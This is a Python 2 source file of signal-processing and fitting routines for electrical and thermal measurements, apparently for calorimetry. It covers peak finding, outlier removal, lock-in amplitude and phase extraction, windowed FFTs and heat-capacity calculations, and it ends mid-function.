def peaksearch1dSG(x, dx=1., critpeakheight=10, critsepind=5, critcurve=None, firstdernpts=7, firstderorder=1, secdernpts=14, secderorder=1, pospeaks=True, negpeaks=True):
    #dx is delta q for one index. zeros of the first derivative of x are grouped together if within critsepind. only negative slope in the firstder is used so no secder is necessary unless a critical curvature (in count nm^2) is specified
if not (pospeaks or negpeaks):
return numpy.float32([])
ifirstder=savgolsmooth(x, nptsoneside=firstdernpts, order=firstderorder, dx=dx, deriv=1)
fullpkind=numpy.float32([])
if pospeaks:
zeroind=arrayzeroind1d(ifirstder, postoneg=True, negtopos=False)
temp=numpy.where(x[(numpy.uint32(numpy.round(zeroind)),)]>critpeakheight)
fullpkind=numpy.append(fullpkind, zeroind[temp])
if negpeaks:
zeroind=arrayzeroind1d(ifirstder, postoneg=False, negtopos=True)
temp=numpy.where(x[(numpy.uint32(numpy.round(zeroind)),)]<(-1*critpeakheight))
fullpkind=numpy.append(fullpkind, zeroind[temp])
if fullpkind.size==0:
return fullpkind
pkind=clustercoordsbymax1d(x, numpy.uint32(numpy.round(fullpkind)), critsepind)
if critcurve is not None:
isecder=savgolsmooth(x, nptsoneside=secdernpts, order=secderorder, dx=dx, deriv=2)
temp=numpy.where(numpy.abs(isecder[(numpy.uint32(numpy.round(pkind)),)])>(critcurve))
pkind=numpy.array(pkind)[temp]
# pkind=list(pkind)
# pkind.reverse()#highest to smallest for pairing below
return numpy.array(pkind, dtype=numpy.float32)
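#usage sketch for peaksearch1dSG (illustrative only; returns fractional peak indices):
#   X=numpy.linspace(-5., 5., 400)
#   Y=Gaussian([-1., 0.3, 50.], X)+Gaussian([2., 0.4, 80.], X)
#   pkind=peaksearch1dSG(Y, dx=X[1]-X[0], critpeakheight=20., critsepind=10, negpeaks=False)
#   peak_positions=X[numpy.uint32(numpy.round(pkind))]   #approximately [-1., 2.]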
def removeoutliers_meanstd(arr, nptsoneside, nsig, gapptsoneside=0): #averages a maximum of 2*nptsoneside points and uses the distance from the mean, scaled by the std and compared to nsig, to determine if the value should be replaced by the mean. if gapptsoneside>0, will do this leaving a gap around the point in question and using nptsoneside-gap points for the mean and std
if nptsoneside==1 and gapptsoneside==0:
return removesinglepixoutliers(arr, critratiotoneighbors=nsig)
nsig=max(nsig, 1.)
nptsoneside=max(nptsoneside, 2.)
gapptsoneside=min(gapptsoneside, nptsoneside-2.)
for gap in range(gapptsoneside+1):
starti=numpy.uint32([max(i-(nptsoneside-gap), 0) for i in range(len(arr))])
stopi=numpy.uint32([min(i+(nptsoneside-gap)+1, len(arr)) for i in range(len(arr))])
#print [numpy.append(arr[i0:i], arr[i+1:i1]) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
#print [(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2, (numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
arr=numpy.array([(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2<(numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2 and (arr[i],) or (numpy.append(arr[i0:i], arr[i+1:i1]).mean(),))[0] for i, i0, i1 in zip(range(len(arr)), starti, stopi)], dtype=arr.dtype)
return arr
def removesinglepixoutliers(arr,critratiotoneighbors=1.5):
c=numpy.where((arr[1:-1]>(critratiotoneighbors*arr[:-2]))*(arr[1:-1]>(critratiotoneighbors*arr[2:])))
c0=c[0]+1
#print len(c0), ' pixels being replaced'
arr[c0]=(arr[c0-1]+arr[c0+1])/2
return arr
def findlocmax(arr, critval=0.):
inds=numpy.where((arr[1:-1]>arr[:-2]) & (arr[1:-1]>arr[2:]) & (arr[1:-1]>critval))
return inds[0]+1
def CalcR0_segdict(d, critrelstd=0.02, AveBeforeDivision=True, dzero=None):
amps=d['samplecurrent']#2d arrays of ncycles x npts
volts=d['samplevoltage']
if not dzero is None:
i0=dzero['samplecurrent'].mean()
v0=dzero['samplevoltage'].mean()
print 'zero baseline of %.2e A, %.2e V subtracted' %(i0, v0)
amps=amps-i0
volts=volts-v0
if AveBeforeDivision:
ro_cycles=numpy.float32([v.mean()/a.mean() for a, v in zip(amps, volts)])
else:
inds=numpy.where(amps<=0.)
amps=replacevalswithneighsin2nddim(amps, inds)
volts=replacevalswithneighsin2nddim(volts, inds)
ro_cycles=(volts/amps).mean(axis=1)
if (ro_cycles.std()/ro_cycles.mean())>critrelstd:
        print 'The relative variation in the measured Ro from the %d cycles is unexpectedly high: %.3f' %(amps.shape[0], ro_cycles.std()/ro_cycles.mean()) #this is a nice way to do number->string formatting, see the internet for details. amps.shape is a tuple where each element gives the length of the array in that dimension so amps.shape[0] is the number of cycles
        newro_cycles=[r for r in ro_cycles if abs((r-ro_cycles.mean()))<ro_cycles.std()]# this is a filtering list comprehension: read from left to right starting with "for". We iterate over ro_cycles and r is the value in each iteration, but the value is only kept if the if statement is True. The if statement checks if r is within 1 std dev of the mean, so the result is a list that does not include the outliers
        newro_cycles=ro_cycles[numpy.abs((ro_cycles-ro_cycles.mean()))<ro_cycles.std()]#this line does the same thing as the previous line - this is the numpy-style way. The expression inside the "[ ]" is a boolean array that is the same shape as ro_cycles and "[ ]" means index the array so numpy only returns the values at indices where there is a True in the boolean array
        if len(newro_cycles)>0 and len(newro_cycles)<len(ro_cycles):#since this is an "and" statement, the 2nd boolean will not execute if the 1st is False. We have the 1st boolean because if all the Ro values were "outliers" then len(newro_cycles) will be zero and we have failed to do filtering. The 2nd boolean checks if we filtered anything.
print 'Ro values from %d cycles were determined to be outliers and removed' %(len(ro_cycles)-len(newro_cycles))
return numpy.float32(newro_cycles).mean()
else:
return volts.mean()/amps.mean()
def tcr(r1, r2, t1, t2):#either all a
if isinstance(r1, numpy.ndarray) or isinstance(r2, numpy.ndarray):
if not isinstance(r1, numpy.ndarray):
r1=numpy.ones(len(r2), dtype='float32')*r1
if not isinstance(r2, numpy.ndarray):
r2=numpy.ones(len(r1), dtype='float32')*r2
ratio=numpy.float32([max(rv1, rv2)/min(rv1, rv2) for rv1, rv2 in zip(r1, r2)])
else:
ratio=max(r1, r2)/min(r1, r2)
return (ratio-1.)/numpy.abs(t2-t1)
def makearr_cyc(x, calcarr):
if isinstance(x, numpy.ndarray):
if len(x)==calcarr.shape[0]:
return x
else:
return numpy.array([x[0]]*calcarr.shape[0])
else:
return numpy.array([x]*calcarr.shape[0])
def temp_res(R, R0, T0, alpha):
print '$%^', R0
return numpy.array([(Rv/R0v-1.)/alphav+T0v for Rv, R0v, T0v, alphav in zip(R, makearr_cyc(R0, R), makearr_cyc(T0, R), makearr_cyc(alpha, R))])
def dT_IVdIdV(I, V, dI, dV, R0, alpha):
return numpy.array([(Iv*dVv-Vv*dIv)/alphav/R0v/Iv**2 for Iv, Vv, dIv, dVv, R0v, alphav in zip(I, V, dI, dV, makearr_cyc(R0, I), makearr_cyc(alpha, I))])
def D_IVdIdV(I, V, dI, dV, R0, alpha):
return numpy.array([Vv*Iv**3*R0v*alphav/(Iv*dVv-Vv*dIv) for Iv, Vv, dIv, dVv, R0v, alphav in zip(I, V, dI, dV, makearr_cyc(R0, I), makearr_cyc(alpha, I))])
def replacevalswithneighsin2nddim(arr, inds):
iall, jall=inds
for n in range(arr.shape[0]):
j=jall[iall==n]
if len(j)==0:
continue
jgood=numpy.int64([jv for jv in range(arr.shape[1]) if not jv in j])
juse=numpy.int64([jgood[numpy.argmin((jgood-jv)**2)] for jv in j])
arr[n, j]=arr[n, juse]
return arr
def replacevalswithneighs(arr, inds):
jgood=numpy.int64([jv for jv in range(arr.shape[0]) if not jv in inds])
juse=numpy.int64([jgood[numpy.argmin((jgood-jv)**2)] for jv in inds])
arr[inds]=arr[juse]
return arr
def timepartition(cycletime, timepartitionfcn='timepart_none', piecelist=[1], yvals=[]):
if timepartitionfcn=='timepart_none':
return numpy.zeros(cycletime.shape, dtype='float64')
elif timepartitionfcn=='timepart_user':
idialog=timepartDialog(None, cycletime, numpieces=len(piecelist), yvals=yvals)
idialog.exec_()
return idialog.timepart
elif timepartitionfcn=='timepart_peakid':
return numpy.zeros(cycletime.shape, dtype='float64')#not implemented yet
else:
print 'ERROR - ABOUT TO ABORT BECAUSE timepartitionfcn IS NOT VALID'
return
def sinarr(nptspercycle, npts, ph=0.):
if isinstance(npts, numpy.ndarray):
npts=len(npts)
return numpy.sin(numpy.arange(npts)*2.*numpy.pi/nptspercycle+ph)
def lia_ampphase(x, ptspercyc, ncyclewin=1., returnphase=True, pad=True, phaseshift=0.):
npts=numpy.round(ptspercyc*ncyclewin)
s=x*sinarr(ptspercyc, x, ph=phaseshift)
c=x*sinarr(ptspercyc, x, ph=numpy.pi/2.+phaseshift)
amp=(numpy.array([(numpy.fft.fft(s[i:i+npts])[0].real)**2+(numpy.fft.fft(c[i:i+npts])[0].real)**2 for i in numpy.arange(len(x)-npts)])**.5)*2./npts
if returnphase:
phase=numpy.array([numpy.arctan(numpy.fft.fft(s[i:i+npts])[0].real/numpy.fft.fft(c[i:i+npts])[0].real) for i in numpy.arange(len(x)-npts)])
if pad:
amp=numpy.concatenate([amp[:npts//2], amp, amp[-1*(len(x)-len(amp)-npts//2):]])
if returnphase:
phase=numpy.concatenate([phase[:npts//2], phase, phase[-1*(len(x)-len(phase)-npts//2):]])
if returnphase:
return amp, phase
return amp
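#usage sketch for lia_ampphase (illustrative only): recover the amplitude of a unit
#sine sampled at 100 points per cycle; away from the padded edges 'amp' should be ~1.0
#   sig=sinarr(100., 1000)
#   amp, phase=lia_ampphase(sig, ptspercyc=100., ncyclewin=2.)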
def lia_xy(x, ptspercyc, ncyclewin=1., nptswinstartinterval=1, phaseshift=0., extrappolyorder=1, interporder=3, interpplotax=None):
npts=numpy.round(ptspercyc*ncyclewin)
s=x*sinarr(ptspercyc, x, ph=numpy.pi+phaseshift)
c=x*sinarr(ptspercyc, x, ph=numpy.pi/2.+phaseshift)
if nptswinstartinterval>1:
starti=range(0, len(x)-npts, nptswinstartinterval)
else:
starti=numpy.arange(len(x)-npts)
liax=(numpy.array([numpy.fft.fft(c[i:i+npts])[0].real for i in starti]))*2./npts
liay=(numpy.array([numpy.fft.fft(s[i:i+npts])[0].real for i in starti]))*2./npts
if nptswinstartinterval>1:
liax=interpwithinarr(starti, liax, order=interporder, interpplotax=interpplotax, interpcols=['k', 'r'])
liay=interpwithinarr(starti, liay, order=interporder, interpplotax=interpplotax, interpcols=['g', 'y'])
nptsextrap=npts//2
liax=concat_extrap_ends(liax, nptsextrap, highside=False, polyorder=extrappolyorder)
liay=concat_extrap_ends(liay, nptsextrap, highside=False, polyorder=extrappolyorder)
liax=concat_extrap_ends(liax, len(x)-len(liax), lowside=False, polyorder=extrappolyorder)
liay=concat_extrap_ends(liay, len(x)-len(liay), lowside=False, polyorder=extrappolyorder)
return liax, liay
def lia_ampphase2(x, ptspercyc, ncyclewin=1., returnphase=True, pad=True, phaseshift=0.):
npts=numpy.round(ptspercyc*ncyclewin)
s=x*sinarr(ptspercyc, x, ph=phaseshift)
c=x*sinarr(ptspercyc, x, ph=numpy.pi/2.+phaseshift)
amp=(numpy.array([(s.sum())**2+(c.sum())**2 for i in numpy.arange(len(x)-npts)])**.5)*2./npts
if returnphase:
phase=numpy.array([numpy.arctan(s.sum()/c.sum()) for i in numpy.arange(len(x)-npts)])
if pad:
amp=numpy.concatenate([amp[:npts//2], amp, amp[-1*(len(x)-len(amp)-npts//2):]])
if returnphase:
phase=numpy.concatenate([phase[:npts//2], phase, phase[-1*(len(x)-len(phase)-npts//2):]])
if returnphase:
return amp, phase
return amp
def liaharmonic_relphase(x, phaserefdata, ptspercyc, ncyclewin_1w=2., ncyclewin_nw=6., harmonic=3., phaseshift=0., pad=True):
#calculated phase is wrt a cosine reference
# x is harmonic data, harmonic = 1 is ok, phaserefdata should be same length but if it is shorter it will be padded to make length x
#ncyclewin_nw is number of harmonic cycles (as opposed to 1w cycles)
npts=numpy.round(ptspercyc*ncyclewin_1w)
s=phaserefdata*sinarr(ptspercyc, phaserefdata, ph=0)
c=phaserefdata*sinarr(ptspercyc, phaserefdata, ph=numpy.pi/2.)
ph1w=numpy.array([numpy.arctan(numpy.fft.fft(s[i:i+npts])[0]/numpy.fft.fft(c[i:i+npts])[0]) for i in numpy.arange(len(phaserefdata)-npts)])
phnw=numpy.concatenate([ph1w[:npts//2.], ph1w, ph1w[-1*(len(x)-len(ph1w)-npts//2.):]])
phnw-=phaseshift
# pylab.figure()
# pylab.plot(ph1w)
# pylab.plot(phnw)
# pylab.figure()
hptspc=ptspercyc/harmonic
nptsnw=numpy.round(hptspc*ncyclewin_nw)
s=sinarr(hptspc, x, ph=0)
c=sinarr(hptspc, x, ph=numpy.pi/2.)
# pylab.plot(numpy.array([(numpy.fft.fft(x[i:i+nptsnw]*(c[i:i+nptsnw]*numpy.cos(p)+s[i:i+nptsnw]*numpy.sin(p)))[0])**2 for i, p in zip(numpy.arange(len(x)-nptsnw), phnw[nptsnw//2:])])*4./nptsnw**2)
# pylab.plot(sfft2cfft2(x, hptspc, ncyclewin_nw), 'k--')
# pylab.show()
amp=(numpy.array([(numpy.fft.fft(x[i:i+nptsnw]*(c[i:i+nptsnw]*numpy.cos(p)+s[i:i+nptsnw]*numpy.sin(p)))[0].real)**2 for i, p in zip(numpy.arange(len(x)-nptsnw), phnw[nptsnw//2:])])**0.5)*2./nptsnw
if pad:
amp=numpy.concatenate([amp[:nptsnw//2], amp, amp[-1*(len(x)-len(amp)-nptsnw//2):]])
return amp
def windowfft_ampphase(x, npts_win, pad=True, ptspercyc=None):
symmetryfactor=2.*numpy.ones(npts_win//2+1, dtype='float64')
symmetryfactor[0]=1.
comp=numpy.array([numpy.fft.fft(x[i:i+npts_win])[:npts_win//2+1]*symmetryfactor for i in numpy.arange(len(x)-npts_win)])
amp, phase=numpy.array([[numpy.abs(c), numpy.angle(c)] for c in comp]).swapaxes(0, 1)
if pad:
amp=numpy.concatenate([amp[:npts_win//2], amp, amp[-1*(len(x)-len(amp)-npts_win//2):]])
phase=numpy.concatenate([phase[:npts_win//2], phase, phase[-1*(len(x)-len(phase)-npts_win//2):]])
return amp/npts_win, phase #frequencies are in units of daqHz and are numpy.array(range(npts_win//2+1))/npts_win.
def windowfft_xy(x, npts_win, pad=True, ptspercyc=None, nptswinstartinterval=1, extrappolyorder=1, interporder=3, interpplotax=None, freqinds=None):
if freqinds is None:
freqinds=range(npts_win//2+1)
symmetryfactor=2.*numpy.ones(len(freqinds), dtype='float64')
symmetryfactor[numpy.where(numpy.array(freqinds)==0)]=1.
if nptswinstartinterval>1:
starti=range(0, len(x)-npts_win, nptswinstartinterval)
else:
starti=numpy.arange(len(x)-npts_win)
print x.shape
comp=numpy.array([numpy.fft.fft(x[i:i+npts_win])[freqinds]*symmetryfactor for i in starti])
print comp.shape
fftx, ffty=numpy.array([[numpy.real(c), numpy.imag(c)] for c in comp]).swapaxes(0, 1).swapaxes(1, 2) #swapaxes makes X,Y first index and then frequencies and then data points like that of x
print fftx.shape
fftx/=npts_win
ffty/=npts_win
if nptswinstartinterval>1:
fftx=numpy.array([interpwithinarr(starti, a, order=interporder, interpplotax=interpplotax, interpcols=['k', 'r']) for a in fftx])
ffty=numpy.array([interpwithinarr(starti, a, order=interporder, interpplotax=interpplotax, interpcols=['g', 'y']) for a in ffty])
nptsextrap=npts_win//2
print fftx.shape
fftx=numpy.array([concat_extrap_ends(a, nptsextrap, highside=False, polyorder=extrappolyorder) for a in fftx])
print nptsextrap, fftx.shape
ffty=numpy.array([concat_extrap_ends(a, nptsextrap, highside=False, polyorder=extrappolyorder) for a in ffty])
fftx=numpy.array([concat_extrap_ends(a, len(x)-len(a), lowside=False, polyorder=extrappolyorder) for a in fftx])
print len(x), len(x)-len(a), fftx.shape
ffty=numpy.array([concat_extrap_ends(a, len(x)-len(a), lowside=False, polyorder=extrappolyorder) for a in ffty])
return fftx.T, ffty.T #frequencies are second index and are in units of daqHz and are numpy.array(range(npts_win//2+1))/npts_win, first index is same as x
def performgenericfilter(arr, filterdict):#filterdict can contain unused key:val pairs but it must contain all those necessary for a given filter step to be performed
iterateoverlastdim=(arr.ndim>=3)
if iterateoverlastdim:
if arr.ndim>3:
origshape=arr.shape
arr=arr.reshape(origshape[:2]+(numpy.prod(origshape[2:]),))
else:
origshape=None
arrupdim=copy.copy(arr).swapaxes(1,2).swapaxes(0,1)
else:
arrupdim=numpy.array([copy.copy(arr)])
fcn_parname_fkey_eachcycle=[\
(removeoutliers_meanstd, ['nptsoneside', 'nsig', 'gapptsoneside'], ['OLnpts', 'OLnsig', 'OLgappts'], [], [], True), \
(savgolsmooth, ['nptsoneside', 'order', 'deriv'], ['SGnpts', 'SGorder', 'SGderiv'], ['binprior'], ['SGbin'], True), \
#(timeintegrate, ['integwindow_s'], ['integwindow_s'], True)\
# (timepartition, ['timepartitionfcn', 'piecelist', 'yvals'], ['timepartitionfcn', 'fitpars', 'yvals'], False)
]
for f, nl, kl, nlopt, klopt, eachcycle in fcn_parname_fkey_eachcycle:
parlist=[((not k in filterdict) or filterdict[k] is None) or (n, filterdict[k]) for n, k in zip(nl, kl)]
if True in parlist:
continue
parlist+=[(n, filterdict[k]) for n, k in zip(nlopt, klopt) if (k in filterdict and not filterdict[k] is None)]
print 'executing filter function ', f.func_name, dict(parlist)
for i in range(len(arrupdim)):
#print arrupdim[i].shape
if eachcycle:
arrupdim[i, :, :]=numpy.array([f(a, **dict(parlist)) for a in arrupdim[i]])
else:
arrupdim[i, :, :]=f(arrupdim[i], **dict(parlist))
#arr2=removeoutliers_meanstd(arr2, nptsoneside=filterdict['OLnpts'], nsig=filterdict['OLnsig'], gapptsoneside=filterdict['OLgappts'])
#savgolsmooth(arr2, nptsoneside=filterdict['SGnpts'], order=filterdict['SGorder'], deriv=filterdict['SGderiv'])
if iterateoverlastdim:
if origshape is None:
return arrupdim.swapaxes(0,1).swapaxes(1,2)
else:
return arrupdim.swapaxes(0,1).swapaxes(1,2).reshape(origshape)
else:
return arrupdim[0]
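#usage sketch for performgenericfilter (illustrative only; 'raw2darray' is an assumed
#(ncycles x npts) array): apply outlier removal followed by Savitzky-Golay smoothing per cycle
#   filterdict={'OLnpts':6, 'OLnsig':2., 'OLgappts':0, 'SGnpts':10, 'SGorder':3, 'SGderiv':0}
#   filtered=performgenericfilter(raw2darray, filterdict)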
#def polyorder4_T(polycoefs, T):
# return numpy.array([polycoefs[i]*(x**i) for i in range(5)]).sum(axis=0)
#
#def T4_intdT_2pieceC(pars, T, intdT, fixedpardict={'startind_2pieceC':numpy.uint16([])}):#startind_2pieceC si the index after which pars[1] will be used as the heat capacity
# c=numpy.ones(T.shape, dtype='float64')*pars[0]
# c[fixedpardict['startind_2pieceC']:]=pars[1]
# return c+pars[2]*T**4+pars[3]*intdT
#HeatLossFunctionLibrary={\ #key:function,list of segdict keys, list of (fitpar name, dflt), dictionary of fixed parameters
# 'polyorder4_T':(polyorder4_T, ['sampletemperature'], 'a+bT+cT^2+dT^3+eT^4', [('a', 1.e-6), ('a', 1.e-8), ('a', 1.e-10), ('a', 1.e-12), ('a', 1.e-14)], None)\
# 'T4_intdT_2pieceC':(T4_intdT_2pieceC, [])
# }
#x=numpy.linspace(10., 20., 40)
#x[1]=0.
#x[18]=666.
#x[19]=66.
##x[10]=44.
#x[-1]=0.
#y=removeoutliers_meanstd(x, 6, 1.5, 2)
#print '***', x-y
def evaluatefitfcn(fitd, segd, interp_kind=1, extrap_order=1, interppars=False):#for interp_kind, see scipy.interpolate.interp1d; this is for interpolating through the excluded parts of the time axis. if interppars then only the piecewise parameters are interpolated and the function is directly evaluated with the fit parameters. if there is only 1 piece to the piecewise function, this is a roundabout way of just evaluating the fit fcn regardless of the excluded region
f=FitFcnLibrary[fitd['fcnname']]
pns=fitd['parnames']
ks=fitd['segdkeys']
ans=[f(**dict([('p', p)]+[(pn, segd[k][i]) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]])) for i, p in enumerate(fitd['fitpars'])]
pt=[segd[k] for pn, k in zip(pns, ks) if k=='cyclepartition' and pn in f.func_code.co_varnames[:f.func_code.co_argcount]]
    if len(pt)==0 or numpy.all(pt[0]>=0):#if there is no partitioning in the function that was just called, or if the partitioning does not exclude regions, then we're done
return ans
pt=pt[0]
for i, (t, a, p) in enumerate(zip(pt, ans, fitd['fitpars'])):#iterates over cycles
iarr=numpy.int32(range(len(a)))
inds=numpy.where(t>=0.)
inds2=numpy.where((t<0.)&(iarr>inds[0][0])&(iarr<inds[0][-1]))#use interpolations in the middle
if len(inds2[0])>0:
if interppars:
fcn=scipy.interpolate.interp1d(iarr[inds], numpy.float32([p[int(round(j))] for j in t[inds]]), kind=interp_kind)
intpar=numpy.float32(fcn(iarr[inds2]))
# take fitpars, replace 0th with intpar use the args in fitfcn except make a cyclepartition that will access the 0th fitpar iteration to get the parameters needed by the fitfcn from the segd due to the intpar value change at every index, new set of fitpar and thus args for fitfcn at every array index
argtuplist_ind2=[[('p', tuple([ip]+list(p[1:])))]+[(pn, numpy.array(k=='cyclepartition' and (0,) or (segd[k][i][j],))) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]] for j, ip in zip(inds2[0], intpar)]
a[inds2]=numpy.float32([f(**dict(tuplist)) for tuplist in argtuplist_ind2])
else:
fcn=scipy.interpolate.interp1d(iarr[inds], a[inds], kind=interp_kind)
a[inds2]=numpy.float32(fcn(iarr[inds2]))
inds2=numpy.where((t<0.)&(iarr<inds[0][0]))
if len(inds2[0])>0:#use spline on the ends and only use as many data points as you need to extrapolate over. interpolations happen with respect to index so that it is always monotonic
if interppars:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][:len(inds2[0])]], numpy.float32([p[int(round(j))] for j in t[inds[0][:len(inds2[0])]]]), k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
                #UnivariateSpline had a problem on 27Aug2011 that was not seen previously, so replace this extrapolation with filling in the end value of the parameter, 4 places below ($$$)
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][0]]))]
# take fitpars, replace 0th with intpar use the args in fitfcn except make a cyclepartition that will access the 0th fitpar iteration to get the parameters needed by the fitfcn from the segd due to the intpar value change at every index, new set of fitpar and thus args for fitfcn at every array index
argtuplist_ind2=[[('p', tuple([ip]+list(p[1:])))]+[(pn, numpy.array(k=='cyclepartition' and (0,) or (segd[k][i][j],))) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]] for j, ip in zip(inds2[0], intpar)]
a[inds2]=numpy.float32([f(**dict(tuplist)) for tuplist in argtuplist_ind2])
else:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][:len(inds2[0])]], a[inds[0][:len(inds2[0])]], k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][0]]))]
a[inds2]=intpar
inds2=numpy.where((t<0.)&(iarr>inds[0][-1]))
if len(inds2[0])>0:
            starti=len(inds[0])-len(inds2[0])#use only the last len(inds2) indices of inds
starti=max(0, starti)
if interppars:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][starti:]], numpy.float32([p[int(round(j))] for j in t[inds[0][starti:]]]), k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][-1]]))]
# take fitpars, replace 0th with intpar use the args in fitfcn except make a cyclepartition that will access the 0th fitpar iteration to get the parameters needed by the fitfcn from the segd due to the intpar value change at every index, new set of fitpar and thus args for fitfcn at every array index
argtuplist_ind2=[[('p', tuple([ip]+list(p[1:])))]+[(pn, numpy.array(k=='cyclepartition' and (0,) or (segd[k][i][j],))) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]] for j, ip in zip(inds2[0], intpar)]
a[inds2]=numpy.float32([f(**dict(tuplist)) for tuplist in argtuplist_ind2])
else:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][starti:]], a[inds[0][starti:]], k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][-1]]))]
a[inds2]=intpar
return ans
#def piecewise(p, c):
# ans=numpy.float64([p[int(round(i))] for i in c])
# if numpy.all(c>=0):#get out as soon as possible for the instances where this is being called during a fit
# return ans
# a=numpy.where(c>=0)[0]
# b=numpy.where(c<0)[0]
# for i in b:# if in the middle of a no-fit region of a piecewise, replace by the average of the nearest points. if the no-fit region extends to the end, replace with the nearest
# x=[]
# j=a[a>i]
# if len(j)>0:
# x+=[ans[j[0]]]
# j=a[a<i]
# if len(j)>0:
# x+=[ans[j[-1]]]
# ans[i]=numpy.mean(x)
# return ans
#piecewise functions are required; if you don't want piecewise behaviour make sure cyclepartition contains nothing above. the piecewise fitpars must come first in the list and there can only be one piecewise parameter
FitFcnLibrary=dict([\
('FIT_T4', lambda p, c, T: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(T**(i+1)) for i, v in enumerate(p[-4:])]).sum(axis=0)),\
('FIT_t4', lambda p, c, t: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(t**(i+1)) for i, v in enumerate(p[-4:])]).sum(axis=0)),\
('FIT_t5', lambda p, c, t: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(t**(i+1)) for i, v in enumerate(p[-5:])]).sum(axis=0)),\
('FIT_T0124', lambda p, c, T: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(T**(i)) for i, v in zip([1, 2, 4], p[-3:])]).sum(axis=0)),\
#('pieceC_T4_intdT', lambda p, c, T, dT: numpy.float64([p[int(round(i))] for i in c])+p[-2]*T+p[-1]*dT),\
])
def calcRofromheatprogram(I1, V1, I2, V2, RoToAl, o_R2poly=1):
d={}
d['P1']=I1*V1
d['P2']=I2*V2
ff=fitfcns()
inds=numpy.where(numpy.array([I1])==0.)#array() is to make it 2-d for the replace fcn
if len(inds[0])>0:
I1=replacevalswithneighsin2nddim(numpy.array([I1]), inds)[0]
V1=replacevalswithneighsin2nddim(numpy.array([V1]), inds)[0]
inds=numpy.where(numpy.array([I2])==0.)#wrap in array() to make it 2-d for the replace fcn, same as the I1 case above
if len(inds[0])>0:
I2=replacevalswithneighsin2nddim(numpy.array([I2]), inds)[0]
V2=replacevalswithneighsin2nddim(numpy.array([V2]), inds)[0]
#R1=V1/I1
R2=V2/I2
coefs=[R2[0]]+[(R2[-1]-R2[0])/len(R2)**i for i in range(1, o_R2poly+1)]
x=numpy.arange(len(R2), dtype='float64')
fcn=ff.polyfit((x, numpy.float64(R2)), coefs)
d['R2fit']=fcn(x)
R12=d['R2fit'][0]
#dR12=ff.finalparams[1]
d['delT2']=(d['R2fit'][-1]-d['R2fit'][0])/(RoToAl[0]*RoToAl[2])
# coefs=[T2[0]]+[(T2[-1]-T2[0])/len(T2)**i for i in range(1, o_T2poly+1)]
# x=numpy.arange(len(T2), dtype='float64')
# fcn=ff.polyfit((x, numpy.float64(T2)), coefs)
# d['T2fit']=fcn(x)
# delT2=d['T2fit'][-1]-d['T2fit'][0]
d['c']=d['P2'].sum()/d['delT2']
d['delT1']=(d['c']*(d['P1'].sum()))
Ro=R12/(1.+RoToAl[2]*d['delT1'])
d['calc_Ro']=Ro
return Ro, d
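# Hedged usage sketch for calcRofromheatprogram (array contents and RoToAl values are
# hypothetical; relies on fitfcns and replacevalswithneighsin2nddim defined elsewhere in this module):
# I1, V1, I2, V2 are 1-d arrays from the two heating segments and RoToAl=(Ro, To, alpha),
# of which only RoToAl[0] and RoToAl[2] are read here:
# Ro, d = calcRofromheatprogram(I1, V1, I2, V2, (100.0, 293.15, 2.5e-3), o_R2poly=1)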
#Fs = 1/SAMPLINGPERIOD; % Sampling frequency
# Fsmax=250e3; %maximum sampling rate: difference between neighbor I and V
#T = 1/Fs; % Sample time
#Ttotal=(length(U)-1)*T; %total experiment time
#fq_base=Fs/POINTSPERCYCLE;
#
#phi0(j)=-angle(i1(j)); % phi0
#
#Xadd2(j)=2*abs(i1(j))*R0(j)*lam*yita(j)/6/pi/fq_base*sin(phi0(j));
#Yadd2(j)=(3*abs(i0(j))*R0(j)+4*abs(i1(j))*R0(j)*cos(phi0(j)))*lam*yita(j)/3/2/pi/fq_base;
#Fv2(j)=v2(j)-Xadd2(j)-1i*Yadd2(j)-i2(j)*R0(j);
#
#mc2(j)=lam*abs(i1(j))^2*i0(j)*R0(j)^2*3/2/abs(Fv2(j))/2/pi/fq_base;
#
#Xadd3(j)=abs(i1(j))*R0(j)*lam*yita(j)/4/2/pi/fq_base*sin(phi0(j));
#Yadd3(j)=(8*abs(i0(j))*R0(j)+9*abs(i1(j))*R0(j)*cos(phi0(j)))*lam*yita(j)/12/2/pi/fq_base;
#Fv3(j)=v3f(j)-Xadd3(j)-1i*Yadd3(j);%-i3(j)*R0(j);
#mc3(j)=lam*abs(i1(j))^3*R0(j)^2/8/abs(Fv3(j))/2/pi/fq_base;
def mCp_2w(VhX, VhY, I0X, I0Y, I1X, I1Y, IhX, IhY, dT, R, Ro, tcr, freq1w, applyVmods=True, returnall=False):
V2=VhX+1j*VhY
I1=I1X+1j*I1Y
I0amp=numpy.sqrt(I0X**2+I0Y**2)
angfreq1w=2.*numpy.pi*freq1w
if applyVmods:
I2=IhX+1j*IhY
phi0=-1.*numpy.angle(I1)
Xadd2=2.*numpy.abs(I1)*Ro*tcr*dT/3./angfreq1w*numpy.sin(phi0)
